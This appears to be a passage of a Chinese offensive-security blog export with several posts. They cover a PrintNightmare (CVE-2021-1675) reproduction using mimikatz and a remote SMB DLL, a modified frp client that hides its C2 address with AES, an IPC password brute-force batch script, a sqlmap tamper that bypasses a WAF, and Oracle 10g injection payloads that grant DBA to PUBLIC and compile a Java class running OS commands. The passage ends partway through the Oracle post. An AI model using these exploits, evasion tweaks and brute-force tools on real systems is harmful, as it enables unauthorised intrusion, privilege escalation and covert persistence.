Windows Server, version 20H2 (Server Core Installation)<br>
Windows 10 Version 20H2 for ARM64-based Systems<br>
Windows 10 Version 20H2 for 32-bit Systems<br>
Windows 10 Version 20H2 for x64-based Systems<br>
Windows Server, version 2004 (Server Core installation)<br>
Windows 10 Version 2004 for x64-based Systems<br>
Windows 10 Version 2004 for ARM64-based Systems<br>
Windows 10 Version 2004 for 32-bit Systems<br>
Windows 10 Version 21H1 for 32-bit Systems<br>
Windows 10 Version 21H1 for ARM64-based Systems<br>
Windows 10 Version 21H1 for x64-based Systems<br>
Windows Server, version 1909 (Server Core installation)<br>
Windows 10 Version 1909 for ARM64-based Systems<br>
Windows 10 Version 1909 for x64-based Systems<br>
Windows 10 Version 1909 for 32-bit Systems<br>
Windows Server 2019  (Server Core installation)<br>
Windows Server 2019<br>
Windows 10 Version 1809 for ARM64-based Systems<br>
Windows 10 Version 1809 for x64-based Systems<br>
Windows 10 Version 1809 for 32-bit Systems</p>
<h2 id="复现"><a class="header-anchor" href="#复现">¶</a>复现</h2>
<p>该漏洞可实现<strong>本地提权</strong>和<strong>RCE</strong><br>
测试脚本（<code>ps1</code>）：</p>
<blockquote>
<p><a href="https://github.com/calebstewart/CVE-2021-1675.git">https://github.com/calebstewart/CVE-2021-1675.git</a></p>
</blockquote>
<h3 id="1-检测"><a class="header-anchor" href="#1-检测">¶</a>1. 检测</h3>
<p>使用<code>Impacket</code>套件检测</p>
<figure class="highlight python"><table><tbody><tr><td class="code"><pre><span class="line">python3 rpcdump.py @<span class="number">192.168</span><span class="number">.2</span><span class="number">.118</span> | findstr MS-RPRN</span><br></pre></td></tr></tbody></table></figure>
<p>若存在漏洞：</p>
<blockquote>
<p>Protocol: [MS-RPRN]: Print System Remote Protocol</p>
</blockquote>
<p><img src="detect.png" alt="detect"></p>
<h3 id="2-本地提权测试结果"><a class="header-anchor" href="#2-本地提权测试结果">¶</a>2. <strong>本地提权</strong>测试结果</h3>
<ul>
<li>2008</li>
</ul>
<p>域环境和本地均测试失败<br>
<img src="2008.png" alt="2008"></p>
<ul>
<li>2012</li>
</ul>
<p>普通用户，提权失败<br>
<img src="2012_fail.png" alt="2012_fail"></p>
<p>管理员，提权成功<br>
<img src="2012_success.png" alt="2012_success"></p>
<p>该脚本完成提权会直接创建一个管理员用户，可以看到2012成功在管理员权限下，并无意义</p>
<h3 id="3-RCE测试结果"><a class="header-anchor" href="#3-RCE测试结果">¶</a>3. <strong>RCE</strong>测试结果</h3>
<p>先开启<code>smb</code>匿名访问，使用<code>3gstudent</code>的脚本开启</p>
<blockquote>
<p><a href="https://github.com/3gstudent/Invoke-BuildAnonymousSMBServer">https://github.com/3gstudent/Invoke-BuildAnonymousSMBServer</a></p>
</blockquote>
<p><img src="3gstudent.png" alt="3gstudent"></p>
<p>开启成功，用目标机2012访问<code>\\192.168.2.50\smb\</code>正常</p>
<ul>
<li>使用<code>cube0x0</code>脚本攻击</li>
</ul>
<blockquote>
<p><a href="https://github.com/cube0x0/CVE-2021-1675">https://github.com/cube0x0/CVE-2021-1675</a></p>
</blockquote>
<p><img src="cube0x0_failed.png" alt="cube0x0_failed"></p>
<p>利用失败，查询错误原因，发现作者说要使用他魔改的<code>impacket</code></p>
<blockquote>
<p><a href="https://github.com/cube0x0/CVE-2021-1675/issues/48">https://github.com/cube0x0/CVE-2021-1675/issues/48</a></p>
</blockquote>
<p>重装，再次攻击，还是失败<br>
<img src="cube0x0_failed2.png" alt="cube0x0_failed2"></p>
<ul>
<li>使用<code>mimikatz</code>攻击</li>
</ul>
<figure class="highlight cmd"><table><tbody><tr><td class="code"><pre><span class="line"><span class="function">misc::<span class="title">printnightmare</span> /<span class="title">server</span>:192.168.2.104 /<span class="title">library</span>:\\192.168.2.50\<span class="title">smb</span>\<span class="title">server.dll</span></span></span><br><span class="line"><span class="function"><span class="title">misc</span>::<span class="title">printnightmare</span> /<span class="title">server</span>:192.168.2.104 /<span class="title">authuser:test</span> /<span class="title">authpassword</span>:1<span class="title">qaz</span>@<span class="title">WSX</span> /<span class="title">library</span>:\\192.168.2.50\<span class="title">smb</span>\<span class="title">server.dll</span></span></span><br></pre></td></tr></tbody></table></figure>
<p><img src="mimikatz.png" alt="mimikatz"></p>
<p>均提示<code>0x5 access denied</code>，但实际上目标访问<code>dll</code>是正常的</p>
<h2 id="总结"><a class="header-anchor" href="#总结">¶</a>总结</h2>
<p>该漏洞虽然显示为通杀，但实测低版本成功率较低，高版本未测，据说能成功<br>
坑点较多，基本都是<code>smb</code>匿名访问不到造成<br>
通用性并不是很强，针对高版本<code>windows</code>（2016等）成功率才会高一些，<br>
提权较为实用，<code>RCE</code>用于域控才能发挥最大效益</p>
<h2 id="参考链接"><a class="header-anchor" href="#参考链接">¶</a>参考链接</h2>
<p><a href="https://www.t00ls.net/viewthread.php?tid=62007">https://www.t00ls.net/viewthread.php?tid=62007</a><br>
<a href="https://www.t00ls.net/viewthread.php?tid=61657">https://www.t00ls.net/viewthread.php?tid=61657</a><br>
<a href="https://www.t00ls.net/thread-62109-1-1.html">https://www.t00ls.net/thread-62109-1-1.html</a></p>
]]></content>
      <tags>
        <tag>CVE</tag>
        <tag>复现</tag>
        <tag>提权</tag>
      </tags>
  </entry>
  <entry>
    <title>Frp改造 - 参数版+AES加密</title>
    <url>/2022/01/11/Frp%E6%94%B9%E9%80%A0-%E5%8F%82%E6%95%B0%E7%89%88-AES%E5%8A%A0%E5%AF%86/</url>
    <content><![CDATA[<h2 id="前言"><a class="header-anchor" href="#前言">¶</a>前言</h2>
<p>参数版已经有很多大佬改造过了，因为最近有需求需要把参数加密化，网上没找到现成的，所以手动改造，顺便学一点<code>go</code>语言 😅</p>
<p>基于<code>uknowsec</code>大佬的文章 <a href="https://uknowsec.cn/posts/notes/FRP%E6%94%B9%E9%80%A0%E8%AE%A1%E5%88%92.html">FRP改造计划</a>，实现作者说的：</p>
<blockquote>
<p>所以可以直接加一些加密啥的，-t参数传入ip加密后的地址，然后在源码里加一个解密的步骤即可。</p>
</blockquote>
<p>另外，个人觉得只加密<code>ip</code>不够隐蔽，所以连同<code>port</code>一起进行<code>AES</code>加密</p>
<h2 id="改造"><a class="header-anchor" href="#改造">¶</a>改造</h2>
<p>只需要修改<code>cmd/frpc/sub/root.go</code>即可</p>
<span id="more"></span>
<h3 id="1-创建AES函数"><a class="header-anchor" href="#1-创建AES函数">¶</a>1. 创建<code>AES</code>函数</h3>
<figure class="highlight go"><table><tbody><tr><td class="code"><pre><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">PKCS7Padding</span><span class="params">(ciphertext []<span class="type">byte</span>, blockSize <span class="type">int</span>)</span></span> []<span class="type">byte</span> {</span><br><span class="line">	padding := blockSize - <span class="built_in">len</span>(ciphertext)%blockSize</span><br><span class="line">	padtext := bytes.Repeat([]<span class="type">byte</span>{<span class="type">byte</span>(padding)}, padding)</span><br><span class="line">	<span class="keyword">return</span> <span class="built_in">append</span>(ciphertext, padtext...)</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">PKCS7UnPadding</span><span class="params">(origData []<span class="type">byte</span>)</span></span> []<span class="type">byte</span> {</span><br><span class="line">	length := <span class="built_in">len</span>(origData)</span><br><span class="line">	unpadding := <span class="type">int</span>(origData[length<span class="number">-1</span>])</span><br><span class="line">	<span class="keyword">return</span> origData[:(length - unpadding)]</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">AesEncrypt</span><span class="params">(origData, key []<span class="type">byte</span>)</span></span> ([]<span class="type">byte</span>, <span class="type">error</span>) {</span><br><span class="line">	block, err := aes.NewCipher(key)</span><br><span class="line">	<span class="keyword">if</span> err != <span class="literal">nil</span> {</span><br><span class="line">		<span class="keyword">return</span> <span class="literal">nil</span>, err</span><br><span class="line">	}</span><br><span class="line">	blockSize := block.BlockSize()</span><br><span class="line">	origData = PKCS7Padding(origData, blockSize)</span><br><span class="line">	blockMode := cipher.NewCBCEncrypter(block, key[:blockSize])</span><br><span class="line">	crypted := <span class="built_in">make</span>([]<span class="type">byte</span>, <span class="built_in">len</span>(origData))</span><br><span class="line">	blockMode.CryptBlocks(crypted, origData)</span><br><span class="line">	<span class="keyword">return</span> crypted, <span class="literal">nil</span></span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">AesDecrypt</span><span class="params">(crypted, key []<span class="type">byte</span>)</span></span> ([]<span class="type">byte</span>, <span class="type">error</span>) {</span><br><span class="line">	block, err := aes.NewCipher(key)</span><br><span class="line">	<span class="keyword">if</span> err != <span class="literal">nil</span> {</span><br><span class="line">		<span class="keyword">return</span> <span class="literal">nil</span>, err</span><br><span class="line">	}</span><br><span class="line">	blockSize := block.BlockSize()</span><br><span class="line">	blockMode := cipher.NewCBCDecrypter(block, key[:blockSize])</span><br><span class="line">	origData := <span class="built_in">make</span>([]<span class="type">byte</span>, <span class="built_in">len</span>(crypted))</span><br><span class="line">	blockMode.CryptBlocks(origData, crypted)</span><br><span class="line">	origData = PKCS7UnPadding(origData)</span><br><span class="line">	<span class="keyword">return</span> origData, <span class="literal">nil</span></span><br><span class="line">}</span><br></pre></td></tr></tbody></table></figure>
<h3 id="2-初始化中定义传参"><a class="header-anchor" href="#2-初始化中定义传参">¶</a>2. 初始化中定义传参</h3>
<p>只需传一个参数，里面包含<code>ip</code>和<code>port</code>即可</p>
<figure class="highlight diff"><table><tbody><tr><td class="code"><pre><span class="line">func init() {</span><br><span class="line">	rootCmd.PersistentFlags().StringVarP(&amp;cfgFile, "config", "c", "./frpc.ini", "config file of frpc")</span><br><span class="line">	rootCmd.PersistentFlags().BoolVarP(&amp;showVersion, "version", "v", false, "version of frpc")</span><br><span class="line"><span class="addition">+	rootCmd.PersistentFlags().StringVarP(&amp;ipPort, "ipPort", "t", "", "ip port")</span></span><br><span class="line">	kcpDoneCh = make(chan struct{})</span><br><span class="line">}</span><br></pre></td></tr></tbody></table></figure>
<h3 id="3-新增函数"><a class="header-anchor" href="#3-新增函数">¶</a>3. 新增函数</h3>
<figure class="highlight go"><table><tbody><tr><td class="code"><pre><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">getFileContent</span><span class="params">(ipPort <span class="type">string</span>)</span></span> {</span><br><span class="line">	AesKey := []<span class="type">byte</span>(<span class="string">"1qaz2wsx3edc4rfv"</span>)  <span class="comment">// 对称秘钥长度必须是16的倍数</span></span><br><span class="line">	encrypted, _ := base64.StdEncoding.DecodeString(ipPort)</span><br><span class="line">	origin, err := AesDecrypt(encrypted, AesKey)</span><br><span class="line">	<span class="keyword">if</span> err != <span class="literal">nil</span> {</span><br><span class="line">		<span class="built_in">panic</span>(err)</span><br><span class="line">	}</span><br><span class="line">	arr := strings.Fields(<span class="type">string</span>(origin))</span><br><span class="line">	ip := arr[<span class="number">0</span>]</span><br><span class="line">	port := arr[<span class="number">1</span>]</span><br><span class="line">	<span class="keyword">var</span> content <span class="type">string</span> = <span class="string">`[common]</span></span><br><span class="line"><span class="string">    server_addr = `</span> + ip + <span class="string">`</span></span><br><span class="line"><span class="string">    server_port = `</span> + port + <span class="string">`</span></span><br><span class="line"><span class="string">	tls_enable = true</span></span><br><span class="line"><span class="string">    token = socks</span></span><br><span class="line"><span class="string">	[socks]</span></span><br><span class="line"><span class="string">	type = tcp</span></span><br><span class="line"><span class="string">	remote_port = 1800</span></span><br><span class="line"><span class="string">	plugin = socks5</span></span><br><span class="line"><span class="string">	`</span></span><br><span class="line">	fileContent = content</span><br><span class="line">}</span><br></pre></td></tr></tbody></table></figure>
<h3 id="4-修改runClient函数"><a class="header-anchor" href="#4-修改runClient函数">¶</a>4. 修改<code>runClient</code>函数</h3>
<figure class="highlight diff"><table><tbody><tr><td class="code"><pre><span class="line"><span class="addition">+ func runClient(cfgFilePath string, ipPort string) (err error) {</span></span><br><span class="line">	var content string</span><br><span class="line"><span class="addition">+	getFileContent(ipPort)</span></span><br><span class="line"><span class="addition">+	// content, err = config.GetRenderedConfFromFile(cfgFilePath)</span></span><br><span class="line"><span class="addition">+	content, err = fileContent, nil</span></span><br><span class="line">	if err != nil {</span><br><span class="line">		return</span><br><span class="line">	}</span><br><span class="line"></span><br><span class="line">	cfg, err := parseClientCommonCfg(CfgFileTypeIni, content)</span><br><span class="line">	if err != nil {</span><br><span class="line">		return</span><br><span class="line">	}</span><br><span class="line"></span><br><span class="line">	pxyCfgs, visitorCfgs, err := config.LoadAllConfFromIni(cfg.User, content, cfg.Start)</span><br><span class="line">	if err != nil {</span><br><span class="line">		return err</span><br><span class="line">	}</span><br><span class="line"></span><br><span class="line">	err = startService(cfg, pxyCfgs, visitorCfgs, cfgFilePath)</span><br><span class="line">	return</span><br><span class="line">}</span><br></pre></td></tr></tbody></table></figure>
<h3 id="5-调用runClient"><a class="header-anchor" href="#5-调用runClient">¶</a>5. 调用<code>runClient()</code></h3>
<figure class="highlight diff"><table><tbody><tr><td class="code"><pre><span class="line">var rootCmd = &amp;cobra.Command{</span><br><span class="line">	Use:   "frpc",</span><br><span class="line">	Short: "frpc is the client of frp (https://github.com/fatedier/frp)",</span><br><span class="line">	RunE: func(cmd *cobra.Command, args []string) error {</span><br><span class="line">		if showVersion {</span><br><span class="line">			fmt.Println(version.Full())</span><br><span class="line">			return nil</span><br><span class="line">		}</span><br><span class="line"></span><br><span class="line">		// Do not show command usage here.</span><br><span class="line"><span class="addition">+		err := runClient(cfgFile, ipPort)</span></span><br><span class="line">		if err != nil {</span><br><span class="line">			fmt.Println(err)</span><br><span class="line">			os.Exit(1)</span><br><span class="line">		}</span><br><span class="line">		return nil</span><br><span class="line">	},</span><br><span class="line">}</span><br></pre></td></tr></tbody></table></figure>
<h3 id="6-编译"><a class="header-anchor" href="#6-编译">¶</a>6. 编译</h3>
<p>修改根目录<code>package.sh</code>，实现直接生成编译文件而不打包</p>
<figure class="highlight bash"><table><tbody><tr><td class="code"><pre><span class="line"><span class="comment"># compile for version</span></span><br><span class="line">make</span><br><span class="line"><span class="keyword">if</span> [ $? -ne 0 ]; <span class="keyword">then</span></span><br><span class="line">    <span class="built_in">echo</span> <span class="string">"make error"</span></span><br><span class="line">    <span class="built_in">exit</span> 1</span><br><span class="line"><span class="keyword">fi</span></span><br><span class="line"></span><br><span class="line">frp_version=`./bin/frps --version`</span><br><span class="line"><span class="built_in">echo</span> <span class="string">"build version: <span class="variable">$frp_version</span>"</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># cross_compiles</span></span><br><span class="line">make -f ./Makefile.cross-compiles</span><br><span class="line"></span><br><span class="line"><span class="built_in">rm</span> -rf ./release/packages</span><br><span class="line"><span class="built_in">mkdir</span> -p ./release/packages</span><br><span class="line"></span><br><span class="line">os_all=<span class="string">'linux windows darwin freebsd'</span></span><br><span class="line">arch_all=<span class="string">'386 amd64 arm arm64 mips64 mips64le mips mipsle'</span></span><br><span class="line"></span><br><span class="line"><span class="built_in">cd</span> ./release</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> os <span class="keyword">in</span> <span class="variable">$os_all</span>; <span class="keyword">do</span></span><br><span class="line">    <span class="keyword">for</span> <span class="built_in">arch</span> <span class="keyword">in</span> <span class="variable">$arch_all</span>; <span class="keyword">do</span></span><br><span class="line">        frp_dir_name=<span class="string">"frp_<span class="variable">${frp_version}</span>_<span class="variable">${os}</span>_<span class="variable">${arch}</span>"</span></span><br><span class="line">        frp_path=<span class="string">"./packages/frp_<span class="variable">${frp_version}</span>_<span class="variable">${os}</span>_<span class="variable">${arch}</span>"</span></span><br><span class="line">        <span class="built_in">cd</span> ..</span><br><span class="line">        <span class="built_in">rm</span> -rf <span class="variable">${frp_path}</span></span><br><span class="line">    <span class="keyword">done</span></span><br><span class="line"><span class="keyword">done</span></span><br><span class="line"></span><br><span class="line"><span class="built_in">cd</span> -</span><br></pre></td></tr></tbody></table></figure>
<p>编译</p>
<figure class="highlight bash"><table><tbody><tr><td class="code"><pre><span class="line">bash package.sh</span><br></pre></td></tr></tbody></table></figure>
<h2 id="效果"><a class="header-anchor" href="#效果">¶</a>效果</h2>
<p><img src="frpc.png" alt="frpc"></p>
<h2 id="参考链接"><a class="header-anchor" href="#参考链接">¶</a>参考链接</h2>
<blockquote>
<p><a href="https://uknowsec.cn/posts/notes/FRP%E6%94%B9%E9%80%A0%E8%AE%A1%E5%88%92.html">https://uknowsec.cn/posts/notes/FRP改造计划.html</a></p>
</blockquote>
]]></content>
      <tags>
        <tag>frp</tag>
        <tag>go</tag>
        <tag>AES</tag>
      </tags>
  </entry>
  <entry>
    <title>IPC暴破 - Bat</title>
    <url>/2018/12/20/IPC%E6%9A%B4%E7%A0%B4-Bat/</url>
    <content><![CDATA[<h2 id="0x01-前言"><a class="header-anchor" href="#0x01-前言">¶</a>0x01 前言</h2>
<p>在内网环境中，掌握一些密码后，最基础，最有效获取服务器权限的方式即<code>ipc</code>暴破</p>
<p>关于<code>ipc</code>暴破，这类工具在网上见的不多。目前工作中见到的有直接开无数个<code>cmd</code>的伪<code>bat</code>，还有身边同事<code>powershell</code>写的<code>ps1</code>，<code>powershell</code>是挺好用的，但有个关键问题是目标机器必须是<code>win7</code>及以上，遇到老机器当然是没法用了。</p>
<p>因此，bat无疑是首选，因其语言较底层，不够高级，写起来比较吃力</p>
<p>花了几天时间改了几个版本，解决了密码特殊字符，菜刀判断进程等各种问题，更新日志在<code>update.txt</code>，应用在自己的实战中。</p>
<div class="note info"><p>阅读本篇文章能了解到：<span class="label success">IPC</span>, <span class="label success">Bat</span></p></div>
<span id="more"></span>
<h2 id="0x02-Bat"><a class="header-anchor" href="#0x02-Bat">¶</a>0x02 Bat</h2>
<p>需要提供以下两个文件</p>
<blockquote>
<p><code>username.txt</code>, <code>password.txt</code></p>
</blockquote>
<p><code>password.txt</code>：不必多说，放入密码即可，一行一个</p>
<p><code>username.txt</code>：放入对应的<code>域\用户</code>，大概是<code>win2012</code>以上域时，在<code>ipc</code>连接时必须加入域，为了兼容高版本，所以直接以<code>域\用户</code>形式存入文件</p>
<p>举个例子：</p>
<figure class="highlight bat"><figcaption><span>username.txt</span></figcaption><table><tbody><tr><td class="code"><pre><span class="line">localhost\administrator</span><br><span class="line">red.ad\redn3ck</span><br></pre></td></tr></tbody></table></figure>
<p>本来想直接在<code>bat</code>中用数组写入<code>username</code>，因为批处理中不自带数组功能，先是实现了数组，结果因为变量延迟导致密码为特殊字符时，如<code>!,^</code>等，导致这些字符无法带入命令，会被批处理吞没，花了好久时间也没搞定如何解决此问题，有解决方法的老哥还望指导</p>
<h3 id="截图"><a class="header-anchor" href="#截图">¶</a>截图</h3>
<p><img src="ipc.png" alt="ipc"></p>
<div class="note warning"><p>温馨提示：程序启动会在当前目录生成`ip.txt`，即`-h`参数指定的ip段，程序结束时会自动删除并生成`out.txt`。</p></div>
<h2 id="0x03-Code"><a class="header-anchor" href="#0x03-Code">¶</a>0x03 Code</h2>
<figure class="highlight bat"><figcaption><span>ipc.bat</span></figcaption><table><tbody><tr><td class="code"><pre><span class="line">@<span class="built_in">echo</span> off</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">:<span class="built_in">start</span></span><br><span class="line"><span class="keyword">if</span> "%<span class="number">1</span>"=="" <span class="keyword">goto</span> usage</span><br><span class="line"><span class="keyword">if</span> "%<span class="number">1</span>"=="-h" <span class="keyword">goto</span> ip-range</span><br><span class="line"></span><br><span class="line">:usage</span><br><span class="line"><span class="built_in">echo</span>.</span><br><span class="line"><span class="built_in">echo</span> Usage:</span><br><span class="line"><span class="built_in">echo</span> 	[-h ips]	host(ip) range, <span class="number">192</span>.<span class="number">168</span>.<span class="number">0</span>.<span class="number">1</span>-<span class="number">255</span></span><br><span class="line"><span class="built_in">echo</span> 	tips:		password.txt is needed.</span><br><span class="line"><span class="built_in">echo</span> 			username.txt is needed.</span><br><span class="line"><span class="built_in">echo</span> 			ipc.bat can <span class="keyword">not</span> add <span class="built_in">path</span> like 'c:\programdata\ipc.bat'.</span><br><span class="line"><span class="built_in">echo</span>.</span><br><span class="line"><span class="built_in">echo</span> example:</span><br><span class="line"><span class="built_in">echo</span> 	ipc.bat -h <span class="number">192</span>.<span class="number">168</span>.<span class="number">0</span>.<span class="number">1</span>-<span class="number">255</span></span><br><span class="line"><span class="keyword">goto</span> :eof</span><br><span class="line">...</span><br><span class="line">..</span><br><span class="line">.</span><br></pre></td></tr></tbody></table></figure>
<h2 id="0x04-参考链接"><a class="header-anchor" href="#0x04-参考链接">¶</a>0x04 参考链接</h2>
<p><a href="https://www.t00ls.net/thread-30632-1-1.html">https://www.t00ls.net/thread-30632-1-1.html</a></p>
]]></content>
      <tags>
        <tag>IPC</tag>
        <tag>bat</tag>
      </tags>
  </entry>
  <entry>
    <title>Mysql注入 - Sqlmap之tamper编写</title>
    <url>/2018/03/28/Mysql%E6%B3%A8%E5%85%A5-Sqlmap%E4%B9%8Btamper%E7%BC%96%E5%86%99/</url>
    <content><![CDATA[<h1>Bypass <code>@</code></h1>
<img src="/2018/03/28/Mysql%E6%B3%A8%E5%85%A5-Sqlmap%E4%B9%8Btamper%E7%BC%96%E5%86%99/bypass@error.png" class="">
<p>如图，遇到<code>@</code>，导致注入失败，使用mysql表名即可绕过</p>
<img src="/2018/03/28/Mysql%E6%B3%A8%E5%85%A5-Sqlmap%E4%B9%8Btamper%E7%BC%96%E5%86%99/bypass@.png" class="">
<h1>Bypass WAF</h1>
<span id="more"></span>
<p>该站存在WAF，<code>union</code>不可与<code>select</code>同时出现，简单使用<code>%0A</code>即可绕过，即<code>union%0Aselect</code>；<br>
另外<code>information_schema.tables</code>也被拉黑，fuzz后发现也不难绕，改为<code>information_schema/**/.tables</code>即可绕过。</p>
<h1>Tamper编写</h1>
<p>这下绕过是没问题了，可惜sqlmap跑不了，遂想编写一针对此站的tamper，供sqlmap调用，但因未实现过此方式，翻看sqlmap中<em>tamper</em>，发现很简单，接口已经准备好，只需要对payload进行处理就能让sqlmap调用。</p>
<p>编写<code>own.py</code>放入<em>tamper</em>目录下即可</p>
<p><font color="red">注意：sqlmap中的payload均是大写</font></p>
<figure class="highlight python"><table><tbody><tr><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python</span></span><br><span class="line"></span><br><span class="line"><span class="string">"""</span></span><br><span class="line"><span class="string">Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)</span></span><br><span class="line"><span class="string">See the file 'doc/COPYING' for copying permission</span></span><br><span class="line"><span class="string">"""</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">from</span> lib.core.enums <span class="keyword">import</span> PRIORITY</span><br><span class="line"></span><br><span class="line">__priority__ = PRIORITY.LOW</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">dependencies</span>():</span><br><span class="line">    <span class="keyword">pass</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">tamper</span>(<span class="params">payload, **kwargs</span>):</span><br><span class="line">    <span class="string">"""</span></span><br><span class="line"><span class="string">    Replaces space character (' ') with comments '/**/'</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">    Tested against:</span></span><br><span class="line"><span class="string">        * Microsoft SQL Server 2005</span></span><br><span class="line"><span class="string">        * MySQL 4, 5.0 and 5.5</span></span><br><span class="line"><span class="string">        * Oracle 10g</span></span><br><span class="line"><span class="string">        * PostgreSQL 8.3, 8.4, 9.0</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">    Notes:</span></span><br><span class="line"><span class="string">        * Useful to bypass weak and bespoke web application firewalls</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">    &gt;&gt;&gt; tamper('SELECT id FROM users')</span></span><br><span class="line"><span class="string">    'SELECT/**/id/**/FROM/**/users'</span></span><br><span class="line"><span class="string">    """</span></span><br><span class="line"></span><br><span class="line">    retVal = payload</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> payload:</span><br><span class="line">        retVal = <span class="string">""</span></span><br><span class="line">        quote, doublequote, firstspace = <span class="literal">False</span>, <span class="literal">False</span>, <span class="literal">False</span></span><br><span class="line"></span><br><span class="line">        retVal = payload.replace(<span class="string">'SCHEMA.'</span>, <span class="string">'SCHEMA/**/.'</span>)</span><br><span class="line">        retVal = retVal.replace(<span class="string">'UNION '</span>, <span class="string">'UNION%0A'</span>)</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> retVal</span><br><span class="line"></span><br></pre></td></tr></tbody></table></figure>
]]></content>
      <tags>
        <tag>注入</tag>
      </tags>
  </entry>
  <entry>
    <title>Oracle注入 - 命令执行&amp;Shell反弹</title>
    <url>/2018/04/25/Oracle%E6%B3%A8%E5%85%A5-%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C-Shell%E5%8F%8D%E5%BC%B9/</url>
    <content><![CDATA[<h1>0x01 Oracle安装</h1>
<p>CentOS 7 安装oracle10g，装了一天，特此记录</p>
<blockquote>
<p><a href="http://blog.51cto.com/semiter/1251332">oracle9i,10G,11G,各版本下载资源</a></p>
<p><a href="https://blog.csdn.net/u013938484/article/details/51175501">Centos6/7下静默安装oracle10g</a></p>
</blockquote>
<h1>0x02 命令执行</h1>
<p>本文测试环境均为：</p>
<blockquote>
<p>CentOS Linux release 7.2.1511 (Core)</p>
<p>Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - 64bit Production</p>
</blockquote>
<p>执行方式很多种，这边只研究Oracle10g，并且本地实测成功的</p>
<ul>
<li><code>DBMS_EXPORT_EXTENSION()</code></li>
<li><code>dbms_xmlquery.newcontext()</code></li>
<li><code>DBMS_JAVA_TEST.FUNCALL()</code></li>
</ul>
<span id="more"></span>
<p><font color="red">注意：注入时需去除末尾分号<code>;</code> </font></p>
<h2 id="方法1-DBMS-EXPORT-EXTENSION"><a class="header-anchor" href="#方法1-DBMS-EXPORT-EXTENSION">¶</a>方法1. DBMS_EXPORT_EXTENSION()</h2>
<blockquote>
<ul>
<li>影响版本：Oracle 8.1.7.4, 9.2.0.1-9.2.0.7, 10.1.0.2-10.1.0.4, 10.2.0.1-10.2.0.2, XE(Fixed in CPU July 2006)</li>
<li>权限：None</li>
<li>详情：这个软件包有许多易受PL/SQL注入攻击的函数。这些函数由SYS拥有，作为SYS执行并且可由PUBLIC执行。因此，如果SQL注入处于上述任何未修补的Oracle数据库版本中，那么攻击者可以调用该函数并直接执行SYS查询。</li>
</ul>
</blockquote>
<p>提权：该请求将导致查询"GRANT DBA TO PUBLIC"以SYS身份执行。 因为这个函数允许PL / SQL缺陷（PL / SQL注入）。一旦这个请求成功执行，PUBLIC获取DBA角色，从而提升当前user的特权</p>
<figure class="highlight sql"><table><tbody><tr><td class="code"><pre><span class="line"><span class="keyword">select</span> SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(<span class="string">'FOO'</span>,<span class="string">'BAR'</span>,<span class="string">'DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant dba to public'''';END;'';END;--'</span>,<span class="string">'SYS'</span>,<span class="number">0</span>,<span class="string">'1'</span>,<span class="number">0</span>) <span class="keyword">from</span> dual</span><br></pre></td></tr></tbody></table></figure>
<h3 id="使用java"><a class="header-anchor" href="#使用java">¶</a>使用java</h3>
<h4 id="（1-创建Java库"><a class="header-anchor" href="#（1-创建Java库">¶</a>（1) 创建Java库</h4>
<figure class="highlight sql"><table><tbody><tr><td class="code"><pre><span class="line"><span class="keyword">select</span> SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(<span class="string">'FOO'</span>,<span class="string">'BAR'</span>,<span class="string">'DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args){try{BufferedReader myReader= new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}}'''';END;'';END;--'</span>,<span class="string">'SYS'</span>,<span class="number">0</span>,<span class="string">'1'</span>,<span class="number">0</span>) <span class="keyword">from</span> dual</span><br></pre></td></tr></tbody></table></figure>
<h4 id="2-赋予Java权限"><a class="header-anchor" href="#2-赋予Java权限">¶</a>(2) 赋予Java权限</h4>
